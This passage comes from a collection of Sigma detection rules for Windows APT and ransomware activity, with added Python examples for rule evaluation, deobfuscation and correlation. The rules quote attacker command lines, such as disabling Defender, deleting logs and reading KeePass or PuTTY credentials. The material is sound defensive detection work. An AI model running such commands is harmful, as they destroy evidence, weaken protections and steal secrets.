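    lookup = {k.lower(): v for k, v in env.items()}  # cmd treats names case-insensitively

    def substitute(m) -> str:
        name, start, length = m.group(1), m.group(2), m.group(3)
        value = lookup.get(name.lower())
        if value is None:
            return m.group(0)
        if start is None:
            return value
        # cmd's substring rules line up with Python slicing: a negative start
        # counts from the end and a negative length drops that many trailing chars.
        piece = value[int(start):]
        if length is not None:
            piece = piece[:int(length)]
        return piece

    return _EXPANSION.sub(substitute, command)


def expand_indicators() -> Dict[str, str]:
    """Expand the two obfuscated fragments quoted in the rule, for illustration."""
    fragments = ["%windir:~-3,1%%PUBLIC:~-9,1%", "%windir:~-1,1%"]
    return {f: expand(f) for f in fragments}


if __name__ == "__main__":
    for fragment, result in expand_indicators().items():
        print(f"{fragment} -> {result!r}")
```

Running this against the assumed environment turns the first fragment into "or" and the second into "s"; a longer obfuscated line can be fed to expand() whole, since unknown variables are passed through unchanged.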

proc_creation_win_apt_pandemic.yml
  1. title: Pandemic Registry Key
  2. id: 9fefd33c-339d-4495-9cba-b96ca006f512
  3. related:
  4. - id: 47e0852a-cf81-4494-a8e6-31864f8c86ed
  5. type: derived
  6. status: experimental
  7. description: Detects Pandemic Windows Implant
  8. references:
  9. - https://wikileaks.org/vault7/#Pandemic
  10. - https://twitter.com/MalwareJake/status/870349480356454401
  11. tags:
  12. - attack.lateral_movement
  13. - attack.t1105
  14. author: Florian Roth
  15. date: 2017/06/01
  16. modified: 2021/09/12
  17. logsource:
  18. category: process_creation
  19. product: windows
  20. detection:
  21. selection:
  22. CommandLine|contains: 'loaddll -a '
  23. condition: selection
  24. falsepositives:
  25. - unknown
  26. level: critical
  27. fields:
  28. - EventID
  29. - CommandLine
  30. - ParentCommandLine
  31. - Image
  32. - User
  33. - TargetObject

proc_creation_win_apt_revil_kaseya.yml
  1. title: REvil Kaseya Incident Malware Patterns
  2. id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5
  3. status: experimental
  4. description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
  5. references:
  6. - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
  7. - https://www.joesandbox.com/analysis/443736/0/html
  8. - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
  9. - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
  10. - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
  11. author: Florian Roth
  12. date: 2021/07/03
  13. modified: 2022/02/28
  14. tags:
  15. - attack.execution
  16. - attack.t1059
  17. - attack.g0115
  18. logsource:
  19. category: process_creation
  20. product: windows
  21. detection:
  22. selection1:
  23. CommandLine|contains:
  24. - 'C:\Windows\cert.exe'
  25. - 'Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled'
  26. - 'del /q /f c:\kworking\agent.crt'
  27. - 'Kaseya VSA Agent Hot-fix'
  28. - '\AppData\Local\Temp\MsMpEng.exe'
  29. - 'rmdir /s /q %SystemDrive%\inetpub\logs'
  30. - 'del /s /q /f %SystemDrive%\\*.log'
  31. - 'c:\kworking1\agent.exe'
  32. - 'c:\kworking1\agent.crt'
  33. selection2:
  34. Image:
  35. - 'C:\Windows\MsMpEng.exe'
  36. - 'C:\Windows\cert.exe'
  37. - 'C:\kworking\agent.exe'
  38. - 'C:\kworking1\agent.exe'
  39. selection3:
  40. CommandLine|contains|all:
  41. - 'del /s /q /f'
  42. - 'WebPages\Errors\webErrorLog.txt'
  43. condition: 1 of selection*
  44. falsepositives:
  45. - Unknown
  46. level: critical

proc_creation_win_apt_slingshot.yml
  1. title: Defrag Deactivation
  2. id: 958d81aa-8566-4cea-a565-59ccd4df27b0
  3. description: Detects the deactivation and disabling of the scheduled defragmentation task as used by the Slingshot APT group
  4. status: experimental
  5. author: Florian Roth, Bartlomiej Czyz (@bczyz1)
  6. date: 2019/03/04
  7. modified: 2021/09/19
  8. references:
  9. - https://securelist.com/apt-slingshot/84312/
  10. tags:
  11. - attack.persistence
  12. - attack.t1053.005
  13. - attack.s0111
  14. logsource:
  15. category: process_creation
  16. product: windows
  17. detection:
  18. selection:
  19. Image|endswith: '\schtasks.exe'
  20. CommandLine|contains:
  21. - '/delete'
  22. - '/change'
  23. CommandLine|contains|all:
  24. - '/TN'
  25. - '\Microsoft\Windows\Defrag\ScheduledDefrag'
  26. condition: selection
  27. falsepositives:
  28. - Unknown
  29. level: medium

proc_creation_win_apt_sofacy.yml
  1. title: Sofacy Trojan Loader Activity
  2. id: ba778144-5e3d-40cf-8af9-e28fb1df1e20
  3. author: Florian Roth, Jonhnathan Ribeiro, oscd.community
  4. status: experimental
  5. date: 2018/03/01
  6. modified: 2021/12/08
  7. description: Detects Trojan loader activity as used by APT28
  8. references:
  9. - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/
  10. - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100
  11. - https://twitter.com/ClearskySec/status/960924755355369472
  12. tags:
  13. - attack.g0007
  14. - attack.execution
  15. - attack.t1059.003
  16. - attack.defense_evasion
  17. - car.2013-10-002
  18. - attack.t1218.011
  19. logsource:
  20. category: process_creation
  21. product: windows
  22. detection:
  23. selection1:
  24. CommandLine|contains|all:
  25. - 'rundll32.exe'
  26. - '%APPDATA%\'
  27. selection2:
  28. - CommandLine|contains: '.dat",'
  29. - CommandLine|endswith:
  30. - '.dll",#1'
  31. - '.dll #1'
  32. - '.dll" #1'
  33. condition: selection1 and selection2
  34. falsepositives:
  35. - Unknown
  36. level: critical

proc_creation_win_apt_sourgrum.yml
  1. title: SOURGUM Actor Behaviours
  2. id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd
  3. description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
  4. author: MSTIC, FPT.EagleEye
  5. status: experimental
  6. level: high
  7. references:
  8. - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection
  9. - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml
  10. - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
  11. date: 2021/06/15
  12. modified: 2021/07/30
  13. tags:
  14. - attack.t1546
  15. - attack.t1546.015
  16. - attack.persistence
  17. - attack.privilege_escalation
  18. logsource:
  19. product: windows
  20. category: process_creation
  21. detection:
  22. selection1:
  23. Image|contains: 'windows\system32\Physmem.sys'
  24. selection2:
  25. Image|contains:
  26. - 'Windows\system32\ime\SHARED\WimBootConfigurations.ini'
  27. - 'Windows\system32\ime\IMEJP\WimBootConfigurations.ini'
  28. - 'Windows\system32\ime\IMETC\WimBootConfigurations.ini'
  29. selection3:
  30. Image|contains:
  31. - 'windows\system32\filepath2'
  32. - 'windows\system32\ime'
  33. registry_command:
  34. CommandLine|contains:
  35. - 'reg add'
  36. registry_key:
  37. CommandLine|contains:
  38. - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32'
  39. - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32'
  40. condition: selection1 or selection2 or (selection3 and registry_command and registry_key)
  41. falsepositives:
  42. - Unknown

proc_creation_win_apt_ta17_293a_ps.yml
  1. title: Ps.exe Renamed SysInternals Tool
  2. id: 18da1007-3f26-470f-875d-f77faf1cab31
  3. status: test
  4. description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
  5. author: Florian Roth
  6. references:
  7. - https://www.us-cert.gov/ncas/alerts/TA17-293A
  8. date: 2017/10/22
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection:
  15. CommandLine: 'ps.exe -accepteula'
  16. condition: selection
  17. falsepositives:
  18. - Renamed SysInternals tool
  19. level: high
  20. tags:
  21. - attack.defense_evasion
  22. - attack.g0035
  23. - attack.t1036.003
  24. - car.2013-05-009

proc_creation_win_apt_ta505_dropper.yml
  1. title: TA505 Dropper Load Pattern
  2. id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4
  3. status: test
  4. description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
  5. author: Florian Roth
  6. references:
  7. - https://twitter.com/ForensicITGuy/status/1334734244120309760
  8. date: 2020/12/08
  9. modified: 2022/01/07
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection:
  15. Image|endswith: '\mshta.exe'
  16. ParentImage|endswith: '\wmiprvse.exe'
  17. condition: selection
  18. falsepositives:
  19. - unknown
  20. level: critical
  21. tags:
  22. - attack.execution
  23. - attack.g0092
  24. - attack.t1106
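
The Lazarus Session Highjacker, Defrag Deactivation and TA505 Dropper Load Pattern rules above combine the same handful of Sigma constructs: endswith/startswith/contains modifiers, the |all modifier, a list of values as OR, a map of fields as AND, and a filter negated in the condition. The following is an added example, not code from the Sigma project (whose reference implementation is pySigma) or from the rules' authors: a minimal evaluator for those constructs, with the three detection sections transcribed into Python and run over constructed process_creation events. The sample paths and command lines are made up; on them the Users\Public copy of msdtc.exe fires while the System32 copy is filtered out, schtasks changing the ScheduledDefrag task fires, and mshta.exe under WmiPrvSE.exe fires.

```python
"""Minimal evaluator for the Sigma field-matching constructs used by the rules
above. Added example, not code from the Sigma project (whose reference
implementation is pySigma); all events below are constructed samples.
Semantics: a selection map is AND across its keys; a list of maps is OR;
|contains, |startswith and |endswith test substrings; a list of values is OR
unless |all is present; string matching is case-insensitive, as the Sigma
specification requires for plain string values."""
from typing import Any, Callable, Dict, List, Tuple, Union

Event = Dict[str, str]
Selection = Union[Dict[str, Any], List[Dict[str, Any]]]


def _as_list(value: Any) -> List[str]:
    return [str(v) for v in (value if isinstance(value, list) else [value])]


def match_field(spec: str, pattern: Any, event: Event) -> bool:
    """Evaluate one 'Field|modifier|...' entry, e.g. 'CommandLine|contains|all'."""
    field, *mods = spec.split("|")
    actual = event.get(field)
    if actual is None:  # a missing field never matches
        return False
    actual = actual.lower()
    if "contains" in mods:
        test: Callable[[str], bool] = lambda p: p in actual
    elif "startswith" in mods:
        test = lambda p: actual.startswith(p)
    elif "endswith" in mods:
        test = lambda p: actual.endswith(p)
    else:  # no modifier: exact, case-insensitive comparison
        test = lambda p: actual == p
    combine = all if "all" in mods else any
    return combine(test(p.lower()) for p in _as_list(pattern))


def match_selection(sel: Selection, event: Event) -> bool:
    """Map = AND over its entries, list of maps = OR over the items."""
    if isinstance(sel, list):
        return any(match_selection(item, event) for item in sel)
    return all(match_field(spec, pat, event) for spec, pat in sel.items())


# Detection sections transcribed from the three rules.
LAZARUS_SESSION = {
    "selection": {"Image|endswith": ["\\msdtc.exe", "\\gpvc.exe"]},
    "filter": {"Image|startswith": ["C:\\Windows\\System32\\", "C:\\Windows\\SysWOW64\\"]},
}
SLINGSHOT_DEFRAG = {
    "selection": {
        "Image|endswith": "\\schtasks.exe",
        "CommandLine|contains": ["/delete", "/change"],
        "CommandLine|contains|all": ["/TN", "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"],
    }
}
TA505_DROPPER = {
    "selection": {"Image|endswith": "\\mshta.exe", "ParentImage|endswith": "\\wmiprvse.exe"}
}

# The 'condition' lines, written as Python instead of parsed from the rule text.
RULES: Dict[str, Callable[[Event], bool]] = {
    "Lazarus Session Highjacker": lambda e: (
        match_selection(LAZARUS_SESSION["selection"], e)
        and not match_selection(LAZARUS_SESSION["filter"], e)
    ),
    "Defrag Deactivation": lambda e: match_selection(SLINGSHOT_DEFRAG["selection"], e),
    "TA505 Dropper Load Pattern": lambda e: match_selection(TA505_DROPPER["selection"], e),
}

# Constructed process_creation events, not real telemetry.
EVENTS: List[Event] = [
    {"Image": "C:\\Users\\Public\\msdtc.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "msdtc.exe"},
    {"Image": "C:\\Windows\\System32\\msdtc.exe", "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "C:\\Windows\\System32\\msdtc.exe"},
    {"Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "schtasks /Change /TN \\Microsoft\\Windows\\Defrag\\ScheduledDefrag /DISABLE"},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "mshta.exe C:\\Users\\Public\\stage.hta"},
]


def run_rules(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule title) for every rule that fires on each event."""
    return [(i, title) for i, ev in enumerate(events)
            for title, cond in RULES.items() if cond(ev)]


if __name__ == "__main__":
    for idx, title in run_rules(EVENTS):
        print(f"event {idx}: {title}")
```

The same evaluator covers the other rules on this page whose condition is plain Boolean logic over selections (1 of selection* is any() over the selections, selection1 and selection2 is and); the timeframe and near aggregation of the Turla medium rule is a correlation over several events and needs a windowed pass rather than a per-event match.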

proc_creation_win_apt_taidoor.yml
  1. title: TAIDOOR RAT DLL Load
  2. id: d1aa3382-abab-446f-96ea-4de52908210b
  3. status: test
  4. description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
  5. author: Florian Roth
  6. references:
  7. - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
  8. date: 2020/07/30
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection1:
  15. CommandLine|contains:
  16. - 'dll,MyStart'
  17. - 'dll MyStart'
  18. selection2a:
  19. CommandLine|endswith:
  20. - ' MyStart'
  21. selection2b:
  22. CommandLine|contains:
  23. - 'rundll32.exe'
  24. condition: selection1 or ( selection2a and selection2b )
  25. falsepositives:
  26. - Unknown
  27. level: critical
  28. tags:
  29. - attack.execution
  30. - attack.t1055.001

proc_creation_win_apt_tropictrooper.yml
  1. title: TropicTrooper Campaign November 2018
  2. id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
  3. author: '@41thexplorer, Microsoft Defender ATP'
  4. status: stable
  5. date: 2019/11/12
  6. modified: 2020/08/27
  7. description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
  8. references:
  9. - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
  10. tags:
  11. - attack.execution
  12. - attack.t1059.001
  13. logsource:
  14. category: process_creation
  15. product: windows
  16. detection:
  17. selection:
  18. CommandLine|contains: 'abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc'
  19. condition: selection
  20. level: high

proc_creation_win_apt_turla_commands_critical.yml
  1. title: Turla Group Lateral Movement
  2. id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f
  3. status: experimental
  4. description: Detects automated lateral movement by Turla group
  5. references:
  6. - https://securelist.com/the-epic-turla-operation/65545/
  7. tags:
  8. - attack.g0010
  9. - attack.execution
  10. - attack.t1059
  11. - attack.lateral_movement
  12. - attack.t1021.002
  13. - attack.discovery
  14. - attack.t1083
  15. - attack.t1135
  16. author: Markus Neis
  17. date: 2017/11/07
  18. modified: 2021/09/19
  19. logsource:
  20. category: process_creation
  21. product: windows
  22. detection:
  23. selection:
  24. CommandLine:
  25. - 'net use \\%DomainController%\C$ "P@ssw0rd" *'
  26. - 'dir c:\\*.doc* /s'
  27. - 'dir %TEMP%\\*.exe'
  28. condition: selection
  29. level: critical
  30. falsepositives:
  31. - Unknown

proc_creation_win_apt_turla_commands_medium.yml
  1. title: Turla Group Lateral Movement
  2. id: 75925535-ca97-4e0a-a850-00b5c00779dc
  3. status: experimental
  4. description: Detects automated lateral movement by Turla group
  5. references:
  6. - https://securelist.com/the-epic-turla-operation/65545/
  7. tags:
  8. - attack.g0010
  9. - attack.execution
  10. - attack.t1059
  11. - attack.lateral_movement
  12. - attack.t1021.002
  13. - attack.discovery
  14. - attack.t1083
  15. - attack.t1135
  16. author: Markus Neis
  17. date: 2017/11/07
  18. modified: 2021/09/19
  19. logsource:
  20. category: process_creation
  21. product: windows
  22. detection:
  23. netCommand1:
  24. CommandLine: 'net view /DOMAIN'
  25. netCommand2:
  26. CommandLine: 'net session'
  27. netCommand3:
  28. CommandLine: 'net share'
  29. timeframe: 1m
  30. condition: netCommand1 | near netCommand2 and netCommand3
  31. level: medium
  32. falsepositives:
  33. - Unknown
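
The medium-level Turla rule above is the only one in this section that uses the timeframe and near aggregation: a 'net view /DOMAIN' is reported only when 'net session' and 'net share' also run within one minute. That aggregation is not implemented by every Sigma backend, so the correlation often has to be done in the SIEM or in a post-processing step. The following is an added example of such a step, not Sigma project code: it groups constructed events by host, anchors on the 'net view /DOMAIN' event and checks for the other two commands within plus or minus the timeframe. The field names ComputerName, UtcTime and CommandLine follow the Sysmon process_creation layout; the hosts and timestamps are made up. Note that the rule's unmodified CommandLine values are exact (case-insensitive) matches, so 'net.exe view /DOMAIN' or a full-path invocation would not trigger it; the example keeps that behaviour.

```python
"""Sliding-window correlation for the timeframe/near aggregation of the Turla
rule above: 'net view /DOMAIN' fires only if 'net session' and 'net share' both
run on the same host within 1m. Added example, not Sigma project code; the
events are constructed samples."""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Event = Dict[str, str]

ANCHOR = "net view /domain"              # netCommand1 in the rule
REQUIRED = {"net session", "net share"}  # netCommand2 and netCommand3
TIMEFRAME = timedelta(minutes=1)


def _when(ev: Event) -> datetime:
    return datetime.fromisoformat(ev["UtcTime"])


def correlate(events: List[Event], timeframe: timedelta = TIMEFRAME) -> List[Tuple[str, str]]:
    """Return (host, UtcTime) of each anchor command that has every REQUIRED
    command on the same host within +/- timeframe."""
    by_host: Dict[str, List[Event]] = {}
    for ev in events:
        by_host.setdefault(ev["ComputerName"], []).append(ev)

    hits: List[Tuple[str, str]] = []
    for host, host_events in by_host.items():
        host_events.sort(key=_when)
        for anchor in host_events:
            # Exact match, as the rule's unmodified CommandLine field implies.
            if anchor["CommandLine"].lower() != ANCHOR:
                continue
            t0 = _when(anchor)
            seen = {e["CommandLine"].lower() for e in host_events
                    if abs(_when(e) - t0) <= timeframe}
            if REQUIRED <= seen:
                hits.append((host, anchor["UtcTime"]))
    return hits


# Constructed events: WS01 runs all three within 45 s, WS02 spreads them over
# five minutes, WS03 never runs the anchor command.
EVENTS: List[Event] = [
    {"ComputerName": "WS01", "UtcTime": "2024-01-15T12:00:00", "CommandLine": "net view /DOMAIN"},
    {"ComputerName": "WS01", "UtcTime": "2024-01-15T12:00:20", "CommandLine": "net session"},
    {"ComputerName": "WS01", "UtcTime": "2024-01-15T12:00:45", "CommandLine": "net share"},
    {"ComputerName": "WS02", "UtcTime": "2024-01-15T12:00:00", "CommandLine": "net view /DOMAIN"},
    {"ComputerName": "WS02", "UtcTime": "2024-01-15T12:00:30", "CommandLine": "net session"},
    {"ComputerName": "WS02", "UtcTime": "2024-01-15T12:05:00", "CommandLine": "net share"},
    {"ComputerName": "WS03", "UtcTime": "2024-01-15T12:00:10", "CommandLine": "net session"},
    {"ComputerName": "WS03", "UtcTime": "2024-01-15T12:00:15", "CommandLine": "net share"},
]

if __name__ == "__main__":
    print(correlate(EVENTS))
```

Only WS01 is reported with the rule's one-minute window; widening the timeframe to ten minutes also reports WS02, which is the knob to turn when the three commands are run by a script with deliberate delays.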

proc_creation_win_apt_turla_comrat_may20.yml
  1. title: Turla Group Commands May 2020
  2. id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c
  3. status: test
  4. description: Detects commands used by Turla group as reported by ESET in May 2020
  5. author: Florian Roth
  6. references:
  7. - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
  8. date: 2020/05/26
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection1:
  15. CommandLine|contains:
  16. - 'tracert -h 10 yahoo.com'
  17. - '.WSqmCons))|iex;'
  18. - 'Fr`omBa`se6`4Str`ing'
  19. selection2:
  20. CommandLine|contains|all:
  21. - 'net use https://docs.live.net'
  22. - '@aol.co.uk'
  23. condition: 1 of selection*
  24. falsepositives:
  25. - Unknown
  26. level: critical
  27. tags:
  28. - attack.g0010
  29. - attack.execution
  30. - attack.t1059.001
  31. - attack.t1053.005
  32. - attack.t1027

proc_creation_win_apt_unc2452_cmds.yml
  1. title: UNC2452 Process Creation Patterns
  2. id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f
  3. description: Detects specific process creation patterns as used by UNC2452, derived from the Microsoft Defender ATP queries provided by Microsoft
  4. status: experimental
  5. references:
  6. - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
  7. tags:
  8. - attack.execution
  9. - attack.t1059.001
  10. # - sunburst
  11. # - unc2452
  12. author: Florian Roth
  13. date: 2021/01/22
  14. modified: 2021/06/27
  15. logsource:
  16. category: process_creation
  17. product: windows
  18. detection:
  19. selection1:
  20. CommandLine|contains:
  21. - '7z.exe a -v500m -mx9 -r0 -p'
  22. selection2:
  23. ParentCommandLine|contains|all:
  24. - 'wscript.exe'
  25. - '.vbs'
  26. CommandLine|contains|all:
  27. - 'rundll32.exe'
  28. - 'C:\Windows'
  29. - '.dll,Tk_'
  30. selection3:
  31. ParentImage|endswith: '\rundll32.exe'
  32. ParentCommandLine|contains: 'C:\Windows'
  33. CommandLine|contains: 'cmd.exe /C '
  34. selection4:
  35. CommandLine|contains|all:
  36. - 'rundll32 c:\windows\'
  37. - '.dll '
  38. specific1:
  39. ParentImage|endswith: '\rundll32.exe'
  40. Image|endswith: '\dllhost.exe'
  41. filter1:
  42. CommandLine:
  43. - ' '
  44. - ''
  45. condition: selection1 or selection2 or selection3 or selection4 or ( specific1 and not filter1 )
  46. falsepositives:
  47. - Unknown
  48. level: critical

proc_creation_win_apt_unc2452_ps.yml
  1. title: UNC2452 PowerShell Pattern
  2. id: b7155193-8a81-4d8f-805d-88de864ca50c
  3. description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  4. status: experimental
  5. references:
  6. - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
  7. - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
  8. - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
  9. tags:
  10. - attack.execution
  11. - attack.t1059.001
  12. - attack.t1047
  13. # - sunburst
  14. author: Florian Roth
  15. date: 2021/01/20
  16. modified: 2021/01/22
  17. logsource:
  18. category: process_creation
  19. product: windows
  20. detection:
  21. selection1:
  22. CommandLine|contains|all:
  23. - 'Invoke-WMIMethod win32_process -name create -argumentlist'
  24. - 'rundll32 c:\windows'
  25. selection2:
  26. CommandLine|contains|all:
  27. - 'wmic /node:'
  28. - 'process call create "rundll32 c:\windows'
  29. condition: selection1 or selection2
  30. falsepositives:
  31. - Unknown, unlikely, but possible
  32. level: critical

proc_creation_win_apt_unidentified_nov_18.yml
  1. title: Unidentified Attacker November 2018
  2. id: 7453575c-a747-40b9-839b-125a0aae324b
  3. status: stable
  4. description: A sigma rule detecting an unidentified attacker who used phishing emails to target high-profile orgs in November 2018. The actor shares some TTPs with
  5. the YYTRIUM/APT29 campaign in 2016.
  6. references:
  7. - https://twitter.com/DrunkBinary/status/1063075530180886529
  8. author: '@41thexplorer, Microsoft Defender ATP'
  9. date: 2018/11/20
  10. modified: 2021/09/19
  11. tags:
  12. - attack.execution
  13. - attack.t1218.011
  14. logsource:
  15. category: process_creation
  16. product: windows
  17. detection:
  18. selection:
  19. CommandLine|contains: 'cyzfc.dat,'
  20. CommandLine|endswith: 'PointFunctionCall'
  21. condition: selection
  22. level: high

proc_creation_win_apt_winnti_mal_hk_jan20.yml
  1. title: Winnti Malware HK University Campaign
  2. id: 3121461b-5aa0-4a41-b910-66d25524edbb
  3. status: test
  4. description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
  5. author: Florian Roth, Markus Neis
  6. references:
  7. - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
  8. date: 2020/02/01
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection1:
  15. ParentImage|contains:
  16. - 'C:\Windows\Temp'
  17. - '\hpqhvind.exe'
  18. Image|startswith: 'C:\ProgramData\DRM'
  19. selection2:
  20. ParentImage|startswith: 'C:\ProgramData\DRM'
  21. Image|endswith: '\wmplayer.exe'
  22. selection3:
  23. ParentImage|endswith: '\Test.exe'
  24. Image|endswith: '\wmplayer.exe'
  25. selection4:
  26. Image: 'C:\ProgramData\DRM\CLR\CLR.exe'
  27. selection5:
  28. ParentImage|startswith: 'C:\ProgramData\DRM\Windows'
  29. Image|endswith: '\SearchFilterHost.exe'
  30. condition: 1 of selection*
  31. falsepositives:
  32. - Unlikely
  33. level: critical
  34. tags:
  35. - attack.defense_evasion
  36. - attack.t1574.002
  37. - attack.g0044

proc_creation_win_apt_winnti_pipemon.yml
  1. title: Winnti Pipemon Characteristics
  2. id: 73d70463-75c9-4258-92c6-17500fe972f2
  3. status: test
  4. description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  5. author: Florian Roth, oscd.community
  6. references:
  7. - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
  8. date: 2020/07/30
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection1:
  15. CommandLine|contains:
  16. - 'setup0.exe -p'
  17. selection2:
  18. CommandLine|contains|all:
  19. - 'setup.exe'
  20. CommandLine|endswith:
  21. - '-x:0'
  22. - '-x:1'
  23. - '-x:2'
  24. condition: 1 of selection*
  25. falsepositives:
  26. - Legitimate setups that use similar flags
  27. level: critical
  28. tags:
  29. - attack.defense_evasion
  30. - attack.t1574.002
  31. - attack.g0044

proc_creation_win_apt_wocao.yml
  1. title: Operation Wocao Activity
  2. id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab
  3. related:
  4. - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d
  5. type: derived
  6. author: Florian Roth, frack113
  7. status: experimental
  8. description: Detects activity mentioned in Operation Wocao report
  9. references:
  10. - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
  11. - https://twitter.com/SBousseaden/status/1207671369963646976
  12. tags:
  13. - attack.discovery
  14. - attack.t1012
  15. - attack.defense_evasion
  16. - attack.t1036.004
  17. - attack.t1027
  18. - attack.execution
  19. - attack.t1053.005
  20. - attack.t1059.001
  21. date: 2019/12/20
  22. modified: 2021/09/19
  23. logsource:
  24. category: process_creation
  25. product: windows
  26. detection:
  27. selection:
  28. CommandLine|contains:
  29. - 'checkadmin.exe 127.0.0.1 -all'
  30. - 'netsh advfirewall firewall add rule name=powershell dir=in'
  31. - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1'
  32. - '/tn win32times /f'
  33. - 'create win32times binPath='
  34. - '\c$\windows\system32\devmgr.dll'
  35. - ' -exec bypass -enc JgAg'
  36. - 'type *keepass\KeePass.config.xml'
  37. - 'iie.exe iie.txt'
  38. - 'reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\'
  39. condition: selection
  40. falsepositives:
  41. - Administrators that use checkadmin.exe tool to enumerate local administrators
  42. level: high

proc_creation_win_apt_zxshell.yml
  1. title: ZxShell Malware
  2. id: f0b70adb-0075-43b0-9745-e82a1c608fcc
  3. status: test
  4. description: Detects a ZxShell start by the well-known exported function name that is called via rundll32
  5. author: Florian Roth, oscd.community, Jonhnathan Ribeiro
  6. references:
  7. - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
  8. date: 2017/07/20
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection:
  15. Image|endswith:
  16. - '\rundll32.exe'
  17. CommandLine|contains:
  18. - 'zxFunction'
  19. - 'RemoteDiskXXXXX'
  20. condition: selection
  21. fields:
  22. - CommandLine
  23. - ParentCommandLine
  24. falsepositives:
  25. - Unlikely
  26. level: critical
  27. tags:
  28. - attack.execution
  29. - attack.t1059.003
  30. - attack.defense_evasion
  31. - attack.t1218.011
  32. - attack.s0412
  33. - attack.g0001

raw_access_thread

sysmon_raw_disk_access_using_illegitimate_tools.yml

registry_event

registry_event_abusing_windows_telemetry_for_persistence.yml
registry_event_add_local_hidden_user.yml
registry_event_add_port_monitor.yml
registry_event_apt_chafer_mar18.yml
registry_event_apt_leviathan.yml
registry_event_apt_oceanlotus_registry.yml
registry_event_apt_pandemic.yml
registry_event_asep_reg_keys_modification.yml
registry_event_asep_reg_keys_modification_classes.yml
registry_event_asep_reg_keys_modification_common.yml
registry_event_asep_reg_keys_modification_currentcontrolset.yml
registry_event_asep_reg_keys_modification_currentversion.yml
